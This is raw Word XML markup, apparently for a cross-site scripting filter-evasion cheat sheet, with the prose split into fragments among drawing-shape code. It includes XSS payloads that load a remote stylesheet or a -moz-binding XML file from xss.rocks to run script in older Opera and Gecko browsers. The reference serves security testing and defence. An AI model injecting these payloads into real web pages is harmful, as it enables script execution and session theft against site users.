                              <a:gd name="T38" fmla="+- 0 690 529"/>
                              <a:gd name="T39" fmla="*/ 690 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9688 6766"/>
                              <a:gd name="T41" fmla="*/ T40 w 2941"/>
                              <a:gd name="T42" fmla="+- 0 710 529"/>
                              <a:gd name="T43" fmla="*/ 710 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9685 6766"/>
                              <a:gd name="T45" fmla="*/ T44 w 2941"/>
                              <a:gd name="T46" fmla="+- 0 711 529"/>
                              <a:gd name="T47" fmla="*/ 71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941" h="183">
                                <a:moveTo>
                                  <a:pt x="291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919" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2940" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2940" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2922" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="291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6766" y="528"/>
                            <a:ext cx="294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3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Link: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0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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId30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http://xss.rocks/xss.css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&gt;;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9" o:spid="_x0000_s1632" style="position:absolute;left:0;text-align:left;margin-left:338.3pt;margin-top:26.45pt;width:147.05pt;height:9.15pt;z-index:-17582592;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6766,529" coordsize="294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">
                <v:shape id="Freeform 801" o:spid="_x0000_s1633" style="position:absolute;left:6766;top:528;width:2941;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="294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y4Z8cA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUvDQBSE7wX/w/IKvbWberBN7LaIKEjpQZtCe3xm&#10;n0k0+zbubtLk37uC4HGYmW+YzW4wjejJ+dqyguUiAUFcWF1zqeCUP8/XIHxA1thYJgUjedhtbyYb&#10;zLS98hv1x1CKCGGfoYIqhDaT0hcVGfQL2xJH78M6gyFKV0rt8BrhppG3SXInDdYcFyps6bGi4uvY&#10;GQXfl64vxnw8r/Pm6b37PJzd/pWVmk2Hh3sQgYbwH/5rv2gFqzSF3zPxCM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cuGfHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m2919,182l21,182r-3,-1l,161r,-3l,21,21,,2919,r21,21l2940,161r-18,20l2919,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2919,711;21,711;18,710;0,690;0,687;0,550;21,529;2919,529;2940,550;2940,690;2922,710;2919,711" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 800" o:spid="_x0000_s1634" type="#_x0000_t202" style="position:absolute;left:6766;top:528;width:294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EHQcEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhO8zUQP4qpRRBwIgqzWg8dn82yD&#10;zUvXRO3+++Uw2PHj+71c964RT+qC9axhMlYgiEtvLFcazsXn+xxEiMgGG8+k4YcCrFeDtyVmxr84&#10;p+cpViKFcMhQQx1jm0kZypochrFviRN3853DmGBXSdPhK4W7Rk6VmkmHllNDjS1tayrvp4fTsLlw&#10;vrPfx+tXfsttUXwoPszuWo+G/WYBIlIf/8V/7r3RMFdpfj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hB0HBAAAA3A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3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Link:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="60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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId31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http://xss.rocks/xss.css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&gt;;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This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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works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Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>longer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9.x)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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fairly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tricky.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>According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RFC2616</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>setting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link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>header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part</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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HTTP1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>spec,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>however</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>browsers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>still</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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(like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox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Opera).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trick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>setting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header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(which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basically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HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>saying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="213" w:firstLine="36"/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73440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8255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="797" name="Freeform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95020" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 2845 1614"/>
                            <a:gd name="T1" fmla="*/ T0 w 1252"/>
                            <a:gd name="T2" fmla="+- 0 195 13"/>
                            <a:gd name="T3" fmla="*/ 195 h 183"/>
                            <a:gd name="T4" fmla="+- 0 1635 1614"/>
                            <a:gd name="T5" fmla="*/ T4 w 1252"/>
                            <a:gd name="T6" fmla="+- 0 195 13"/>
                            <a:gd name="T7" fmla="*/ 195 h 183"/>
                            <a:gd name="T8" fmla="+- 0 1632 1614"/>
                            <a:gd name="T9" fmla="*/ T8 w 1252"/>
                            <a:gd name="T10" fmla="+- 0 195 13"/>
                            <a:gd name="T11" fmla="*/ 195 h 183"/>
                            <a:gd name="T12" fmla="+- 0 1614 1614"/>
                            <a:gd name="T13" fmla="*/ T12 w 1252"/>
                            <a:gd name="T14" fmla="+- 0 174 13"/>
                            <a:gd name="T15" fmla="*/ 174 h 183"/>
                            <a:gd name="T16" fmla="+- 0 1614 1614"/>
                            <a:gd name="T17" fmla="*/ T16 w 1252"/>
                            <a:gd name="T18" fmla="+- 0 171 13"/>
                            <a:gd name="T19" fmla="*/ 171 h 183"/>
                            <a:gd name="T20" fmla="+- 0 1614 1614"/>
                            <a:gd name="T21" fmla="*/ T20 w 1252"/>
                            <a:gd name="T22" fmla="+- 0 34 13"/>
                            <a:gd name="T23" fmla="*/ 34 h 183"/>
                            <a:gd name="T24" fmla="+- 0 1635 1614"/>
                            <a:gd name="T25" fmla="*/ T24 w 1252"/>
                            <a:gd name="T26" fmla="+- 0 13 13"/>
                            <a:gd name="T27" fmla="*/ 13 h 183"/>
                            <a:gd name="T28" fmla="+- 0 2845 1614"/>
                            <a:gd name="T29" fmla="*/ T28 w 1252"/>
                            <a:gd name="T30" fmla="+- 0 13 13"/>
                            <a:gd name="T31" fmla="*/ 13 h 183"/>
                            <a:gd name="T32" fmla="+- 0 2866 1614"/>
                            <a:gd name="T33" fmla="*/ T32 w 1252"/>
                            <a:gd name="T34" fmla="+- 0 34 13"/>
                            <a:gd name="T35" fmla="*/ 34 h 183"/>
                            <a:gd name="T36" fmla="+- 0 2866 1614"/>
                            <a:gd name="T37" fmla="*/ T36 w 1252"/>
                            <a:gd name="T38" fmla="+- 0 174 13"/>
                            <a:gd name="T39" fmla="*/ 174 h 183"/>
                            <a:gd name="T40" fmla="+- 0 2848 1614"/>
                            <a:gd name="T41" fmla="*/ T40 w 1252"/>
                            <a:gd name="T42" fmla="+- 0 195 13"/>
                            <a:gd name="T43" fmla="*/ 195 h 183"/>
                            <a:gd name="T44" fmla="+- 0 2845 1614"/>
                            <a:gd name="T45" fmla="*/ T44 w 1252"/>
                            <a:gd name="T46" fmla="+- 0 195 13"/>
                            <a:gd name="T47" fmla="*/ 195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1252" h="183">
                              <a:moveTo>
                                <a:pt x="1231" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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1231" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1252" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1252" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1234" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1231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FBD28" id="Freeform 798" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.7pt;margin-top:.65pt;width:62.6pt;height:9.15pt;z-index:-1758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5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" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="781685,123825;13335,123825;11430,123825;0,110490;0,108585;0,21590;13335,8255;781685,8255;795020,21590;795020,110490;783590,123825;781685,123825" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>REL=stylesheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="15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style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sheet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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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JavaScript,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-36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FireFox:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5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8972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104140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4166235" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="794" name="Group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66235" cy="116205"/>
                          <a:chOff x="1614" y="164"/>
                          <a:chExt cx="6561" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="795" name="Freeform 797"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="164"/>
                            <a:ext cx="6561" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8154 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6561"/>
                              <a:gd name="T2" fmla="+- 0 346 164"/>
                              <a:gd name="T3" fmla="*/ 346 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6561"/>
                              <a:gd name="T6" fmla="+- 0 346 164"/>
                              <a:gd name="T7" fmla="*/ 346 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6561"/>
                              <a:gd name="T10" fmla="+- 0 346 164"/>
                              <a:gd name="T11" fmla="*/ 346 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6561"/>
                              <a:gd name="T14" fmla="+- 0 325 164"/>
                              <a:gd name="T15" fmla="*/ 325 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6561"/>
                              <a:gd name="T18" fmla="+- 0 322 164"/>
                              <a:gd name="T19" fmla="*/ 322 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6561"/>
                              <a:gd name="T22" fmla="+- 0 185 164"/>
                              <a:gd name="T23" fmla="*/ 185 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6561"/>
                              <a:gd name="T26" fmla="+- 0 164 164"/>
                              <a:gd name="T27" fmla="*/ 164 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8154 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6561"/>
                              <a:gd name="T30" fmla="+- 0 164 164"/>
                              <a:gd name="T31" fmla="*/ 164 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8175 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6561"/>
                              <a:gd name="T34" fmla="+- 0 185 164"/>
                              <a:gd name="T35" fmla="*/ 185 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8175 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6561"/>
                              <a:gd name="T38" fmla="+- 0 325 164"/>
                              <a:gd name="T39" fmla="*/ 325 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8157 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6561"/>
                              <a:gd name="T42" fmla="+- 0 346 164"/>
                              <a:gd name="T43" fmla="*/ 346 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8154 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6561"/>
                              <a:gd name="T46" fmla="+- 0 346 164"/>
                              <a:gd name="T47" fmla="*/ 34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61" h="183">
                                <a:moveTo>
                                  <a:pt x="654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540" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6561" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6561" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6543" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="654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Text Box 79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4"/>
                            <a:ext cx="656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&lt;META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HTTP-EQUIV="Link"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Content="&lt;</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId32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http://xss.rocks/xss.css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&gt;;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REL=stylesheet"&gt;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5" o:spid="_x0000_s1635" style="position:absolute;margin-left:80.7pt;margin-top:8.2pt;width:328.05pt;height:9.15pt;z-index:-15626752;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,164" coordsize="656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">
                <v:shape id="Freeform 797" o:spid="_x0000_s1636" style="position:absolute;left:1614;top:164;width:6561;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="656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XLccYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE70K/w/IK3upGi9qkriJCxYOIf0q9PrKv&#10;2dDs25DdaPz2rlDwOMzMb5jZorOVuFDjS8cKhoMEBHHudMmFgu/T19sHCB+QNVaOScGNPCzmL70Z&#10;Ztpd+UCXYyhEhLDPUIEJoc6k9Lkhi37gauLo/brGYoiyKaRu8BrhtpKjJJlIiyXHBYM1rQzlf8fW&#10;KgiT9ebcjswwfT+st+d03O5/8p1S/ddu+QkiUBee4f/2RiuYpmN4nIlH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XLccYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m6540,182l21,182r-3,l,161r,-3l,21,21,,6540,r21,21l6561,161r-18,21l6540,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6540,346;21,346;18,346;0,325;0,322;0,185;21,164;6540,164;6561,185;6561,325;6543,346;6540,346" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 796" o:spid="_x0000_s1637" type="#_x0000_t202" style="position:absolute;left:1614;top:164;width:656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o7f8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNHtKauooUBaEgxnjw+Jp9&#10;JovZtzG7avz3XaHgcZiZb5jpvLeNuFLnjWMFo2ECgrh02nClYF+s3j9B+ICssXFMCu7kYT57fZli&#10;pt2Nc7ruQiUihH2GCuoQ2kxKX9Zk0Q9dSxy9o+sshii7SuoObxFuGzlOklRaNBwXamzpu6bytLtY&#10;BYsD50tz3vxu82NuimKS8E96Uupt0C++QATqwzP8315rBR+TFB5n4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Ojt/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&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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HTTP-EQUIV="Link"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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Content="&lt;</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId33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http://xss.rocks/xss.css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&gt;;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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REL=stylesheet"&gt;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rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1360" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="91"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Remote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4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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="125"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works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Gecko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engines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works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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binding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XUL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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think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irony</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assumes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Gecko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safer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therefore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vulnerable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vast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>majority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sites: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9638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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3896360" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="791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6360" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="6136" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="792" name="Freeform 794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6136" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7729 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 6136"/>
                              <a:gd name="T2" fmla="+- 0 348 165"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 6136"/>
                              <a:gd name="T6" fmla="+- 0 348 165"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 6136"/>
                              <a:gd name="T10" fmla="+- 0 347 165"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 6136"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 6136"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 6136"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 6136"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7729 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 6136"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7750 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 6136"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7750 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 6136"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7732 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 6136"/>
                              <a:gd name="T42" fmla="+- 0 347 165"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7729 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 6136"/>
                              <a:gd name="T46" fmla="+- 0 348 165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136" h="183">
                                <a:moveTo>
                                  <a:pt x="611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115" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6136" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6136" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6118" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="611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Text Box 79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613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&lt;STYLE&gt;BODY{-moz-binding:url("</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId34" w:anchor="xss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http://xss.rocks/xssmoz.xml#xss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")}&lt;/STYLE&gt;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2" o:spid="_x0000_s1638" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:306.8pt;height:9.15pt;z-index:-15620096;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="613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">
                <v:shape id="Freeform 794" o:spid="_x0000_s1639" style="position:absolute;left:1614;top:165;width:6136;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="613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iAm8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzW7CMBCE70i8g7VI3MABlb8UgygUBNxKeYAl3iYR&#10;8TqKTUjfHiMhcRzNzDea+bIxhaipcrllBYN+BII4sTrnVMH5d9ubgnAeWWNhmRT8k4Plot2aY6zt&#10;nX+oPvlUBAi7GBVk3pexlC7JyKDr25I4eH+2MuiDrFKpK7wHuCnkMIrG0mDOYSHDktYZJdfTzSj4&#10;/jgOrnTZfW3qUTk7HFbT0W2dKNXtNKtPEJ4a/w6/2nutYDIbwv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4gJvEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m6115,183l21,183r-3,-1l,161r,-3l,21,21,,6115,r21,21l6136,161r-18,21l6115,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6115,348;21,348;18,347;0,326;0,323;0,186;21,165;6115,165;6136,186;6136,326;6118,347;6115,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 793" o:spid="_x0000_s1640" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:613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2Y58UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxBaupq4goFAQxpoceX7PP&#10;ZDH7Ns1uNf57Vyh4HGbmG2a+7GwtLtR641jBeJSAIC6cNlwq+Mq3wykIH5A11o5JwY08LBf93hxT&#10;7a6c0eUYShEh7FNUUIXQpFL6oiKLfuQa4uidXGsxRNmWUrd4jXBby9ckmUiLhuNChQ2tKyrOxz+r&#10;YPXN2cb87n8O2SkzeT5LeDc5K/Uy6FYfIAJ14Rn+b39qBe+zN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TZjn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&lt;STYLE&gt;BODY{-moz-binding:url("</w:t>
